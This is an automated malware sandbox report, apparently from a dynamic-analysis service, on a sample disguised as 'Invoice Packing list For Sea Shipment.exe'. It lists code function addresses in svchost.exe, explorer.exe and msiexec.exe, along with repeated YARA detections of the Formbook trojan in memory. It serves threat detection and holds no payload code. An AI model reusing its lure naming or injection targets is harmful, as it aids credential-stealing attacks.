Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC2D02	2_2_03CC2D02
Source: C:\Windows\explorer.exe	Code function: 3_2_0E426232	3_2_0E426232
Source: C:\Windows\explorer.exe	Code function: 3_2_0E420B32	3_2_0E420B32
Source: C:\Windows\explorer.exe	Code function: 3_2_0E420B30	3_2_0E420B30
Source: C:\Windows\explorer.exe	Code function: 3_2_0E425036	3_2_0E425036
Source: C:\Windows\explorer.exe	Code function: 3_2_0E41C082	3_2_0E41C082
Source: C:\Windows\explorer.exe	Code function: 3_2_0E41DD02	3_2_0E41DD02
Source: C:\Windows\explorer.exe	Code function: 3_2_0E423912	3_2_0E423912
Source: C:\Windows\explorer.exe	Code function: 3_2_0E4295CD	3_2_0E4295CD
Source: C:\Windows\explorer.exe	Code function: 3_2_10D5E232	3_2_10D5E232
Source: C:\Windows\explorer.exe	Code function: 3_2_10D54082	3_2_10D54082
Source: C:\Windows\explorer.exe	Code function: 3_2_10D5D036	3_2_10D5D036
Source: C:\Windows\explorer.exe	Code function: 3_2_10D615CD	3_2_10D615CD
Source: C:\Windows\explorer.exe	Code function: 3_2_10D5B912	3_2_10D5B912
Source: C:\Windows\explorer.exe	Code function: 3_2_10D55D02	3_2_10D55D02
Source: C:\Windows\explorer.exe	Code function: 3_2_10D58B30	3_2_10D58B30
Source: C:\Windows\explorer.exe	Code function: 3_2_10D58B32	3_2_10D58B32
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_004463E3	4_2_004463E3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C6E4F6	4_2_04C6E4F6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C72446	4_2_04C72446
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C64420	4_2_04C64420
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C80591	4_2_04C80591
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BC0535	4_2_04BC0535
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BDC6E0	4_2_04BDC6E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BBC7C0	4_2_04BBC7C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BC0770	4_2_04BC0770
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BE4750	4_2_04BE4750
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C52000	4_2_04C52000
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C781CC	4_2_04C781CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C801AA	4_2_04C801AA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C741A2	4_2_04C741A2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C48158	4_2_04C48158
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BB0100	4_2_04BB0100
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C5A118	4_2_04C5A118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C402C0	4_2_04C402C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C60274	4_2_04C60274
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C803E6	4_2_04C803E6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BCE3F0	4_2_04BCE3F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C7A352	4_2_04C7A352
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BB0CF2	4_2_04BB0CF2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C60CB5	4_2_04C60CB5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BC0C00	4_2_04BC0C00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BD8DBF	4_2_04BD8DBF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BBADE0	4_2_04BBADE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BCAD00	4_2_04BCAD00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C5CD1F	4_2_04C5CD1F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C7EEDB	4_2_04C7EEDB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BD2E90	4_2_04BD2E90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C7CE93	4_2_04C7CE93
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C7EE26	4_2_04C7EE26
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BC0E59	4_2_04BC0E59
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BCCFE0	4_2_04BCCFE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C3EFA0	4_2_04C3EFA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BB2FC8	4_2_04BB2FC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C34F40	4_2_04C34F40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BE0F30	4_2_04BE0F30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C02F28	4_2_04C02F28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C62F30	4_2_04C62F30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BA68B8	4_2_04BA68B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BEE8F0	4_2_04BEE8F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BC2840	4_2_04BC2840
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BCA840	4_2_04BCA840
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BC29A0	4_2_04BC29A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C8A9A6	4_2_04C8A9A6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BD6962	4_2_04BD6962
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BBEA80	4_2_04BBEA80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C76BD7	4_2_04C76BD7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C7AB40	4_2_04C7AB40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BB1460	4_2_04BB1460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C7F43F	4_2_04C7F43F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C895C3	4_2_04C895C3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C5D5B0	4_2_04C5D5B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C77571	4_2_04C77571
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C716CC	4_2_04C716CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C05630	4_2_04C05630
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C7F7B0	4_2_04C7F7B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C6F0CC	4_2_04C6F0CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C7F0E0	4_2_04C7F0E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C770E9	4_2_04C770E9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BC70C0	4_2_04BC70C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BCB1B0	4_2_04BCB1B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C8B16B	4_2_04C8B16B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BAF172	4_2_04BAF172
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BF516C	4_2_04BF516C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BC52A0	4_2_04BC52A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C612ED	4_2_04C612ED
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BDB2C0	4_2_04BDB2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C0739A	4_2_04C0739A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C7132D	4_2_04C7132D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BAD34C	4_2_04BAD34C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C7FCF2	4_2_04C7FCF2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C39C32	4_2_04C39C32
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BDFDC0	4_2_04BDFDC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C71D5A	4_2_04C71D5A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C77D73	4_2_04C77D73
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BC3D40	4_2_04BC3D40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BC9EB0	4_2_04BC9EB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BC1F92	4_2_04BC1F92
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04B83FD2	4_2_04B83FD2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04B83FD5	4_2_04B83FD5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C7FFB1	4_2_04C7FFB1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C7FF09	4_2_04C7FF09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BC38E0	4_2_04BC38E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C2D800	4_2_04C2D800
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C55910	4_2_04C55910
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BC9950	4_2_04BC9950
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BDB950	4_2_04BDB950
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C6DAC6	4_2_04C6DAC6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C05AA0	4_2_04C05AA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C61AA3	4_2_04C61AA3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C5DAAC	4_2_04C5DAAC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C77A46	4_2_04C77A46
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C7FA49	4_2_04C7FA49
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C33A6C	4_2_04C33A6C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C35BF0	4_2_04C35BF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BDFB80	4_2_04BDFB80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04BFDBF9	4_2_04BFDBF9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04C7FB76	4_2_04C7FB76
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02CDC3F2	4_2_02CDC3F2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02CDE79D	4_2_02CDE79D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02CC9E4C	4_2_02CC9E4C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02CC9E50	4_2_02CC9E50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02CC2FB0	4_2_02CC2FB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_02CC2D90	4_2_02CC2D90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04A2A036	4_2_04A2A036
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04A2E5CD	4_2_04A2E5CD
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04A22D02	4_2_04A22D02
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04A21082	4_2_04A21082
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04A28912	4_2_04A28912
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04A2B232	4_2_04A2B232
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04A25B32	4_2_04A25B32
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_04A25B30	4_2_04A25B30

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03887E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0382B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03875130 appears 58 times
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: String function: 00445975 appears 65 times
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: String function: 0041171A appears 37 times
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: String function: 0041718C appears 45 times
Source: C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe	Code function: String function: 0040E6D0 appears 35 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 04C3F290 appears 105 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 04BAB970 appears 280 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 04C2EA12 appears 86 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 04BF5130 appears 58 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 04C07E54 appears 111 times

Source: Invoice Packing list For Sea Shipment.exe, 00000000.00000003.1436616041.000000000470D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Invoice Packing list For Sea Shipment.exe
Source: Invoice Packing list For Sea Shipment.exe, 00000000.00000003.1430113785.0000000004563000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Invoice Packing list For Sea Shipment.exe

Source: Invoice Packing list For Sea Shipment.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Invoice Packing list For Sea Shipment.exe.3060000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3869714162.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3869714162.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3869714162.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3868825943.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3868825943.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3868825943.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1493293667.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1493293667.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1493293667.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3869667743.0000000004920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3869667743.0000000004920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3869667743.0000000004920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1493319949.0000000003B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1493319949.0000000003B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1493319949.0000000003B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1492033473.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1492033473.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1492033473.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1439157854.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1439157854.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1439157854.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Invoice Packing list For Sea Shipment.exe PID: 7692, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
